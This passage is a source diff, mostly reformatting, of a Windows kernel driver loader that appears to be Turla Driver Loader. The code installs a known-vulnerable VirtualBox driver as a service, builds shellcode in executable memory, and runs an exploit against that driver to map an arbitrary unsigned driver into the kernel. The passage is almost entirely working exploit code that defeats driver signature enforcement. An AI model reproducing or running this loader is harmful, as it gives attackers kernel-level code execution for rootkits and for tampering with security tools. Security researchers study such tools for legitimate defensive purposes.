&bytesIO, NULL)) - { - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call failed"), g_ConsoleOutput, TRUE); - break; - } - else { - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call complete"), g_ConsoleOutput, TRUE); - } + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_SET_VM_FOR_FAST, + &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN, + &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call failed"), g_ConsoleOutput, TRUE); + break; + } + else { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call complete"), g_ConsoleOutput, TRUE); + } - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_FAST_DO_NOP"), g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_FAST_DO_NOP"), g_ConsoleOutput, TRUE); - paramOut = 0; - DeviceIoControl(g_hVBox, SUP_IOCTL_FAST_DO_NOP, - NULL, 0, - ¶mOut, sizeof(paramOut), &bytesIO, NULL); + paramOut = 0; + DeviceIoControl(g_hVBox, SUP_IOCTL_FAST_DO_NOP, + NULL, 0, + ¶mOut, sizeof(paramOut), &bytesIO, NULL); - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_FREE"), g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_FREE"), g_ConsoleOutput, TRUE); - RtlSecureZeroMemory(&ldrFree, sizeof(ldrFree)); - ldrFree.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; - ldrFree.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; - ldrFree.Hdr.cbIn = SUP_IOCTL_LDR_FREE_SIZE_IN; - ldrFree.Hdr.cbOut = SUP_IOCTL_LDR_FREE_SIZE_OUT; - ldrFree.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; - ldrFree.Hdr.rc = 0; - ldrFree.u.In.pvImageBase = ImageBase; + RtlSecureZeroMemory(&ldrFree, sizeof(ldrFree)); + ldrFree.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + ldrFree.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + ldrFree.Hdr.cbIn = SUP_IOCTL_LDR_FREE_SIZE_IN; + ldrFree.Hdr.cbOut = SUP_IOCTL_LDR_FREE_SIZE_OUT; + ldrFree.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + ldrFree.Hdr.rc = 0; + ldrFree.u.In.pvImageBase = ImageBase; - DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_FREE, - &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_IN, - &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_OUT, &bytesIO, NULL); + DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_FREE, + &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_IN, + &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_OUT, &bytesIO, NULL); - break; - } + break; + } - if (pLoadTask != NULL) { - memIO = 0; - NtFreeVirtualMemory(NtCurrentProcess(), &pLoadTask, &memIO, MEM_RELEASE); - } + if (pLoadTask != NULL) { + memIO = 0; + NtFreeVirtualMemory(NtCurrentProcess(), &pLoadTask, &memIO, MEM_RELEASE); + } - if (g_hVBox != INVALID_HANDLE_VALUE) { - CloseHandle(g_hVBox); - g_hVBox = INVALID_HANDLE_VALUE; - } + if (g_hVBox != INVALID_HANDLE_VALUE) { + CloseHandle(g_hVBox); + g_hVBox = INVALID_HANDLE_VALUE; + } } /* @@ -376,129 +376,129 @@ void TDLExploit( * */ UINT TDLMapDriver( - LPWSTR lpDriverFullName - ) + LPWSTR lpDriverFullName +) { - UINT result = (UINT)-1; - ULONG isz; - SIZE_T memIO; - ULONG_PTR KernelBase, KernelImage = 0, xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0; - HMODULE Image = NULL; - PIMAGE_NT_HEADERS FileHeader; - PBYTE Buffer = NULL; - UNICODE_STRING uStr; - ANSI_STRING routineName; - NTSTATUS status; - WCHAR text[256]; + UINT result = (UINT)-1; + ULONG isz; + SIZE_T memIO; + ULONG_PTR KernelBase, KernelImage = 0, xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0; + HMODULE Image = NULL; + PIMAGE_NT_HEADERS FileHeader; + PBYTE Buffer = NULL; + UNICODE_STRING uStr; + ANSI_STRING routineName; + NTSTATUS status; + WCHAR text[256]; - KernelBase = supGetNtOsBase(); - while (KernelBase != 0) { + KernelBase = supGetNtOsBase(); + while (KernelBase != 0) { - _strcpy(text, TEXT("Ldr: Kernel base = 0x")); - u64tohex(KernelBase, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + _strcpy(text, TEXT("Ldr: Kernel base = 0x")); + u64tohex(KernelBase, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - RtlSecureZeroMemory(&uStr, sizeof(uStr)); - RtlInitUnicodeString(&uStr, lpDriverFullName); - status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&Image); - if ((!NT_SUCCESS(status)) || (Image == NULL)) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading input driver file"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: Input driver file loaded at 0x")); - u64tohex((ULONG_PTR)Image, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + RtlSecureZeroMemory(&uStr, sizeof(uStr)); + RtlInitUnicodeString(&uStr, lpDriverFullName); + status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&Image); + if ((!NT_SUCCESS(status)) || (Image == NULL)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading input driver file"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: Input driver file loaded at 0x")); + u64tohex((ULONG_PTR)Image, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - FileHeader = RtlImageNtHeader(Image); - if (FileHeader == NULL) - break; + FileHeader = RtlImageNtHeader(Image); + if (FileHeader == NULL) + break; - isz = FileHeader->OptionalHeader.SizeOfImage; + isz = FileHeader->OptionalHeader.SizeOfImage; - cuiPrintText(g_ConOut, TEXT("Ldr: Loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, TEXT("Ldr: Loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); - RtlInitUnicodeString(&uStr, L"ntoskrnl.exe"); - status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&KernelImage); - if ((!NT_SUCCESS(status)) || (KernelImage == 0)) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: ntoskrnl.exe loaded at 0x")); - u64tohex(KernelImage, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + RtlInitUnicodeString(&uStr, L"ntoskrnl.exe"); + status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&KernelImage); + if ((!NT_SUCCESS(status)) || (KernelImage == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: ntoskrnl.exe loaded at 0x")); + u64tohex(KernelImage, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - RtlInitString(&routineName, "ExAllocatePoolWithTag"); - status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xExAllocatePoolWithTag); - if ((!NT_SUCCESS(status)) || (xExAllocatePoolWithTag == 0)) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error, ExAllocatePoolWithTag address not found"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: ExAllocatePoolWithTag 0x")); - u64tohex(KernelBase + (xExAllocatePoolWithTag - KernelImage), _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + RtlInitString(&routineName, "ExAllocatePoolWithTag"); + status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xExAllocatePoolWithTag); + if ((!NT_SUCCESS(status)) || (xExAllocatePoolWithTag == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, ExAllocatePoolWithTag address not found"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: ExAllocatePoolWithTag 0x")); + u64tohex(KernelBase + (xExAllocatePoolWithTag - KernelImage), _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - RtlInitString(&routineName, "PsCreateSystemThread"); - status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); - if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x")); - u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + RtlInitString(&routineName, "PsCreateSystemThread"); + status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); + if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x")); + u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - memIO = isz + PAGE_SIZE; - NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&Buffer, 0, &memIO, - MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); - if (Buffer == NULL) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error, unable to allocate shellcode"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: Shellcode allocated at 0x")); - u64tohex((ULONG_PTR)Buffer, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + memIO = isz + PAGE_SIZE; + NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&Buffer, 0, &memIO, + MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (Buffer == NULL) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, unable to allocate shellcode"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: Shellcode allocated at 0x")); + u64tohex((ULONG_PTR)Buffer, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - // mov rcx, ExAllocatePoolWithTag - // mov rdx, PsCreateSystemThread + // mov rcx, ExAllocatePoolWithTag + // mov rdx, PsCreateSystemThread - Buffer[0x00] = 0x48; // mov rcx, xxxxx - Buffer[0x01] = 0xb9; - *((PULONG_PTR)&Buffer[2]) = - KernelBase + (xExAllocatePoolWithTag - KernelImage); - Buffer[0x0a] = 0x48; // mov rdx, xxxxx - Buffer[0x0b] = 0xba; - *((PULONG_PTR)&Buffer[0x0c]) = - KernelBase + (xPsCreateSystemThread - KernelImage); + Buffer[0x00] = 0x48; // mov rcx, xxxxx + Buffer[0x01] = 0xb9; + *((PULONG_PTR)&Buffer[2]) = + KernelBase + (xExAllocatePoolWithTag - KernelImage); + Buffer[0x0a] = 0x48; // mov rdx, xxxxx + Buffer[0x0b] = 0xba; + *((PULONG_PTR)&Buffer[0x0c]) = + KernelBase + (xPsCreateSystemThread - KernelImage); - RtlCopyMemory(Buffer + 0x14, - TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); - RtlCopyMemory(Buffer + scDataOffset, Image, isz); + RtlCopyMemory(Buffer + 0x14, + TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); + RtlCopyMemory(Buffer + scDataOffset, Image, isz); - cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE); - TDLResolveKernelImport((ULONG_PTR)Buffer + scDataOffset, KernelImage, KernelBase); + cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE); + TDLResolveKernelImport((ULONG_PTR)Buffer + scDataOffset, KernelImage, KernelBase); - cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE); - TDLExploit(Buffer, isz + PAGE_SIZE); - result = 0; - break; - } + cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE); + TDLExploit(Buffer, isz + PAGE_SIZE); + result = 0; + break; + } - if (Buffer != NULL) { - memIO = 0; - NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &memIO, MEM_RELEASE); - } + if (Buffer != NULL) { + memIO = 0; + NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &memIO, MEM_RELEASE); + } - return result; + return result; } /* @@ -510,123 +510,123 @@ UINT TDLMapDriver( * */ HANDLE TDLStartVulnerableDriver( - VOID - ) + VOID +) { - PBYTE DrvBuffer; - ULONG DataSize = 0, bytesIO; - HANDLE hDevice = INVALID_HANDLE_VALUE; - WCHAR szDriverFileName[MAX_PATH * 2]; - SC_HANDLE schSCManager = NULL; - LPWSTR msg; + PBYTE DrvBuffer; + ULONG DataSize = 0, bytesIO; + HANDLE hDevice = INVALID_HANDLE_VALUE; + WCHAR szDriverFileName[MAX_PATH * 2]; + SC_HANDLE schSCManager = NULL; + LPWSTR msg; - DrvBuffer = supQueryResourceData(1, g_hInstance, &DataSize); - while (DrvBuffer != NULL) { + DrvBuffer = supQueryResourceData(1, g_hInstance, &DataSize); + while (DrvBuffer != NULL) { - //lets give scm nice looking path so this piece of shit code from early 90x wont fuckup somewhere. - RtlSecureZeroMemory(szDriverFileName, sizeof(szDriverFileName)); - if (!GetSystemDirectory(szDriverFileName, MAX_PATH)) { + //lets give scm nice looking path so this piece of shit code from early 90x wont fuckup somewhere. + RtlSecureZeroMemory(szDriverFileName, sizeof(szDriverFileName)); + if (!GetSystemDirectory(szDriverFileName, MAX_PATH)) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Error loading VirtualBox driver, GetSystemDirectory failed"), - g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, + TEXT("Ldr: Error loading VirtualBox driver, GetSystemDirectory failed"), + g_ConsoleOutput, TRUE); - break; - } + break; + } - schSCManager = OpenSCManager(NULL, - NULL, - SC_MANAGER_ALL_ACCESS - ); - if (schSCManager == NULL) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Error opening SCM database"), - g_ConsoleOutput, TRUE); + schSCManager = OpenSCManager(NULL, + NULL, + SC_MANAGER_ALL_ACCESS + ); + if (schSCManager == NULL) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Error opening SCM database"), + g_ConsoleOutput, TRUE); - break; - } + break; + } - //lookup main vbox driver device, if found, try to unload all possible, unload order is sensitive - if (supIsObjectExists(L"\\Device", L"VBoxDrv")) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Active VirtualBox found in system, attempt unload it"), - g_ConsoleOutput, TRUE); + //lookup main vbox driver device, if found, try to unload all possible, unload order is sensitive + if (supIsObjectExists(L"\\Device", L"VBoxDrv")) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Active VirtualBox found in system, attempt unload it"), + g_ConsoleOutput, TRUE); - if (scmStopDriver(schSCManager, TEXT("VBoxNetAdp"))) { - cuiPrintText(g_ConOut, - TEXT("SCM: VBoxNetAdp driver unloaded"), - g_ConsoleOutput, TRUE); - } - if (scmStopDriver(schSCManager, TEXT("VBoxNetLwf"))) { - cuiPrintText(g_ConOut, - TEXT("SCM: VBoxNetLwf driver unloaded"), - g_ConsoleOutput, TRUE); - } - if (scmStopDriver(schSCManager, TEXT("VBoxUSBMon"))) { - cuiPrintText(g_ConOut, - TEXT("SCM: VBoxUSBMon driver unloaded"), - g_ConsoleOutput, TRUE); - } - Sleep(1000); - if (scmStopDriver(schSCManager, TEXT("VBoxDrv"))) { - cuiPrintText(g_ConOut, - TEXT("SCM: VBoxDrv driver unloaded"), - g_ConsoleOutput, TRUE); - } - } + if (scmStopDriver(schSCManager, TEXT("VBoxNetAdp"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxNetAdp driver unloaded"), + g_ConsoleOutput, TRUE); + } + if (scmStopDriver(schSCManager, TEXT("VBoxNetLwf"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxNetLwf driver unloaded"), + g_ConsoleOutput, TRUE); + } + if (scmStopDriver(schSCManager, TEXT("VBoxUSBMon"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxUSBMon driver unloaded"), + g_ConsoleOutput, TRUE); + } + Sleep(1000); + if (scmStopDriver(schSCManager, TEXT("VBoxDrv"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxDrv driver unloaded"), + g_ConsoleOutput, TRUE); + } + } - //if vbox installed backup it driver, do it before dropping our - if (g_VBoxInstalled) { - if (supBackupVBoxDrv(FALSE) == FALSE) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Error while doing VirtualBox driver backup"), - g_ConsoleOutput, TRUE); + //if vbox installed backup it driver, do it before dropping our + if (g_VBoxInstalled) { + if (supBackupVBoxDrv(FALSE) == FALSE) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Error while doing VirtualBox driver backup"), + g_ConsoleOutput, TRUE); - break; - } - } + break; + } + } - //drop our vboxdrv version - _strcat(szDriverFileName, TEXT("\\drivers\\VBoxDrv.sys")); - bytesIO = (ULONG)supWriteBufferToFile(szDriverFileName, DrvBuffer, - (SIZE_T)DataSize, FALSE, FALSE); + //drop our vboxdrv version + _strcat(szDriverFileName, TEXT("\\drivers\\VBoxDrv.sys")); + bytesIO = (ULONG)supWriteBufferToFile(szDriverFileName, DrvBuffer, + (SIZE_T)DataSize, FALSE, FALSE); - if (bytesIO != DataSize) { + if (bytesIO != DataSize) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Error writing VirtualBox on disk"), - g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, + TEXT("Ldr: Error writing VirtualBox on disk"), + g_ConsoleOutput, TRUE); - break; - } + break; + } - //if vbox not found in system install driver in scm - if (g_VBoxInstalled == FALSE) { - scmInstallDriver(schSCManager, VBoxDrvSvc, szDriverFileName); - } + //if vbox not found in system install driver in scm + if (g_VBoxInstalled == FALSE) { + scmInstallDriver(schSCManager, VBoxDrvSvc, szDriverFileName); + } - //run driver - if (scmStartDriver(schSCManager, VBoxDrvSvc) == TRUE) { + //run driver + if (scmStartDriver(schSCManager, VBoxDrvSvc) != FALSE) { - if (scmOpenDevice(VBoxDrvSvc, &hDevice)) - msg = TEXT("SCM: Vulnerable driver loaded and opened"); - else - msg = TEXT("SCM: Driver device open failure"); + if (scmOpenDevice(VBoxDrvSvc, &hDevice)) + msg = TEXT("SCM: Vulnerable driver loaded and opened"); + else + msg = TEXT("SCM: Driver device open failure"); - } - else { - msg = TEXT("SCM: Vulnerable driver load failure"); - } + } + else { + msg = TEXT("SCM: Vulnerable driver load failure"); + } - cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); - break; - } + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + break; + } - //post cleanup - if (schSCManager != NULL) { - CloseServiceHandle(schSCManager); - } - return hDevice; + //post cleanup + if (schSCManager != NULL) { + CloseServiceHandle(schSCManager); + } + return hDevice; } /* @@ -638,72 +638,74 @@ HANDLE TDLStartVulnerableDriver( * */ void TDLStopVulnerableDriver( - VOID - ) + VOID +) { - SC_HANDLE schSCManager; - LPWSTR msg; - UNICODE_STRING uStr; - OBJECT_ATTRIBUTES ObjectAttributes; + SC_HANDLE schSCManager; + LPWSTR msg; + UNICODE_STRING uStr; + OBJECT_ATTRIBUTES ObjectAttributes; - cuiPrintText(g_ConOut, - TEXT("SCM: Unloading vulnerable driver"), - g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, + TEXT("SCM: Unloading vulnerable driver"), + g_ConsoleOutput, TRUE); - if (g_hVBox != INVALID_HANDLE_VALUE) - CloseHandle(g_hVBox); + if (g_hVBox != INVALID_HANDLE_VALUE) + CloseHandle(g_hVBox); - schSCManager = OpenSCManager(NULL, - NULL, - SC_MANAGER_ALL_ACCESS - ); + schSCManager = OpenSCManager(NULL, + NULL, + SC_MANAGER_ALL_ACCESS + ); - if (schSCManager == NULL) { - cuiPrintText(g_ConOut, - TEXT("SCM: Cannot open database, unable unload driver"), - g_ConsoleOutput, TRUE); - return; - } + if (schSCManager == NULL) { + cuiPrintText(g_ConOut, + TEXT("SCM: Cannot open database, unable unload driver"), + g_ConsoleOutput, TRUE); + return; + } + //stop driver in any case + if (scmStopDriver(schSCManager, VBoxDrvSvc)) + msg = TEXT("SCM: Vulnerable driver successfully unloaded"); + else + msg = TEXT("SCM: Unexpected error while unloading driver"); - //stop driver in any case - if (scmStopDriver(schSCManager, VBoxDrvSvc)) - msg = TEXT("SCM: Vulnerable driver successfully unloaded"); - else - msg = TEXT("SCM: Unexpected error while unloading driver"); + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); - cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + //if VBox not installed - remove from scm database and delete file + if (g_VBoxInstalled == FALSE) { - //if VBox not installed - remove from scm database and delete file - if (g_VBoxInstalled == FALSE) { + if (scmRemoveDriver(schSCManager, VBoxDrvSvc)) + msg = TEXT("SCM: Driver entry removed from registry"); + else + msg = TEXT("SCM: Error removing driver entry from registry"); - if (scmRemoveDriver(schSCManager, VBoxDrvSvc)) - msg = TEXT("SCM: Driver entry removed from registry"); - else - msg = TEXT("SCM: Error removing driver entry from registry"); + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); - cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + uStr.Buffer = NULL; + uStr.Length = 0; + uStr.MaximumLength = 0; + RtlInitUnicodeString(&uStr, L"\\??\\globalroot\\systemroot\\system32\\drivers\\VBoxDrv.sys"); + InitializeObjectAttributes(&ObjectAttributes, &uStr, OBJ_CASE_INSENSITIVE, NULL, NULL); + if (NT_SUCCESS(NtDeleteFile(&ObjectAttributes))) + msg = TEXT("Ldr: Driver file removed"); + else + msg = TEXT("Ldr: Error removing driver file"); - RtlInitUnicodeString(&uStr, L"\\??\\globalroot\\systemroot\\system32\\drivers\\VBoxDrv.sys"); - InitializeObjectAttributes(&ObjectAttributes, &uStr, OBJ_CASE_INSENSITIVE, NULL, NULL); - if (NT_SUCCESS(NtDeleteFile(&ObjectAttributes))) - msg = TEXT("Ldr: Driver file removed"); - else - msg = TEXT("Ldr: Error removing driver file"); + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); - cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + } + else { + //VBox software present, restore original driver and exit + if (supBackupVBoxDrv(TRUE)) + msg = TEXT("Ldr: Original driver restored"); + else + msg = TEXT("Ldr: Unexpected error while restoring original driver"); - } - else { - //VBox software present, restore original driver and exit - if (supBackupVBoxDrv(TRUE)) - msg = TEXT("Ldr: Original driver restored"); - else - msg = TEXT("Ldr: Unexpected error while restoring original driver"); - - cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); - } - CloseServiceHandle(schSCManager); + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + } + CloseServiceHandle(schSCManager); } /* @@ -715,37 +717,37 @@ void TDLStopVulnerableDriver( * */ UINT TDLProcessCommandLine( - LPWSTR lpCommandLine - ) + LPWSTR lpCommandLine +) { - UINT retVal = (UINT)-1; - WCHAR szInputFile[MAX_PATH + 1]; - ULONG c; - - //input file - c = 0; - RtlSecureZeroMemory(szInputFile, sizeof(szInputFile)); - GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &c); - if (c == 0) { - cuiPrintText(g_ConOut, - T_LOADERUSAGE, - g_ConsoleOutput, FALSE); - return retVal; - } + UINT retVal = (UINT)-1; + WCHAR szInputFile[MAX_PATH + 1]; + ULONG c; - if (PathFileExists(szInputFile)) { - g_hVBox = TDLStartVulnerableDriver(); - if (g_hVBox != INVALID_HANDLE_VALUE) { - retVal = TDLMapDriver(szInputFile); - TDLStopVulnerableDriver(); - } - } - else { - cuiPrintText(g_ConOut, - TEXT("Ldr: Input file not found"), - g_ConsoleOutput, FALSE); - } - return retVal; + //input file + c = 0; + RtlSecureZeroMemory(szInputFile, sizeof(szInputFile)); + GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &c); + if (c == 0) { + cuiPrintText(g_ConOut, + T_LOADERUSAGE, + g_ConsoleOutput, FALSE); + return retVal; + } + + if (PathFileExists(szInputFile)) { + g_hVBox = TDLStartVulnerableDriver(); + if (g_hVBox != INVALID_HANDLE_VALUE) { + retVal = TDLMapDriver(szInputFile); + TDLStopVulnerableDriver(); + } + } + else { + cuiPrintText(g_ConOut, + TEXT("Ldr: Input file not found"), + g_ConsoleOutput, FALSE); + } + return retVal; } /* @@ -759,80 +761,81 @@ UINT TDLProcessCommandLine( void TDLMain() { - BOOL cond = FALSE; - UINT uResult = 0; - DWORD dwTemp; - LONG x; - OSVERSIONINFOW osv; - WCHAR text[256]; + BOOL cond = FALSE; + UINT uResult = 0; + DWORD dwTemp; + LONG x; + OSVERSIONINFOW osv; + WCHAR text[256]; - __security_init_cookie(); + __security_init_cookie(); - do { - g_hInstance = GetModuleHandle(NULL); + do { - g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE); - if (g_ConOut == INVALID_HANDLE_VALUE) { - uResult = (UINT)-1; - break; - } + g_hInstance = GetModuleHandle(NULL); - g_ConsoleOutput = TRUE; - if (!GetConsoleMode(g_ConOut, &dwTemp)) { - g_ConsoleOutput = FALSE; - } + g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE); + if (g_ConOut == INVALID_HANDLE_VALUE) { + uResult = (UINT)-1; + break; + } - SetConsoleTitle(T_LOADERTITLE); - SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT); - if (g_ConsoleOutput == FALSE) { - WriteFile(g_ConOut, &BE, sizeof(WCHAR), &dwTemp, NULL); - } + g_ConsoleOutput = TRUE; + if (!GetConsoleMode(g_ConOut, &dwTemp)) { + g_ConsoleOutput = FALSE; + } - cuiPrintText(g_ConOut, - T_LOADERINTRO, - g_ConsoleOutput, TRUE); + SetConsoleTitle(T_LOADERTITLE); + SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT); + if (g_ConsoleOutput == FALSE) { + WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dwTemp, NULL); + } + + cuiPrintText(g_ConOut, + T_LOADERINTRO, + g_ConsoleOutput, TRUE); - x = InterlockedIncrement((PLONG)&g_lApplicationInstances); - if (x > 1) { - cuiPrintText(g_ConOut, - T_LOADERRUN, - g_ConsoleOutput, FALSE); - uResult = (UINT)-1; - break; - } + x = InterlockedIncrement((PLONG)&g_lApplicationInstances); + if (x > 1) { + cuiPrintText(g_ConOut, + T_LOADERRUN, + g_ConsoleOutput, FALSE); + uResult = (UINT)-1; + break; + } - //check version first - RtlSecureZeroMemory(&osv, sizeof(osv)); - osv.dwOSVersionInfoSize = sizeof(osv); - RtlGetVersion((PRTL_OSVERSIONINFOW)&osv); - if (osv.dwMajorVersion < 6) { - cuiPrintText(g_ConOut, - T_LOADERUNSUP, - g_ConsoleOutput, FALSE); - uResult = (UINT)-1; - break; - } + //check version first + RtlSecureZeroMemory(&osv, sizeof(osv)); + osv.dwOSVersionInfoSize = sizeof(osv); + RtlGetVersion((PRTL_OSVERSIONINFOW)&osv); + if (osv.dwMajorVersion < 6) { + cuiPrintText(g_ConOut, + T_LOADERUNSUP, + g_ConsoleOutput, FALSE); + uResult = (UINT)-1; + break; + } - _strcpy(text, TEXT("Ldr: Windows v")); - ultostr(osv.dwMajorVersion, _strend(text)); - _strcat(text, TEXT(".")); - ultostr(osv.dwMinorVersion, _strend(text)); - _strcat(text, TEXT(" build ")); - ultostr(osv.dwBuildNumber, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + _strcpy(text, TEXT("Ldr: Windows v")); + ultostr(osv.dwMajorVersion, _strend(text)); + _strcat(text, TEXT(".")); + ultostr(osv.dwMinorVersion, _strend(text)); + _strcat(text, TEXT(" build ")); + ultostr(osv.dwBuildNumber, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - g_VBoxInstalled = TDLVBoxInstalled(); - if (g_VBoxInstalled) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Warning VirtualBox software installed, conficts possible"), - g_ConsoleOutput, TRUE); - } + g_VBoxInstalled = TDLVBoxInstalled(); + if (g_VBoxInstalled) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Warning, VirtualBox 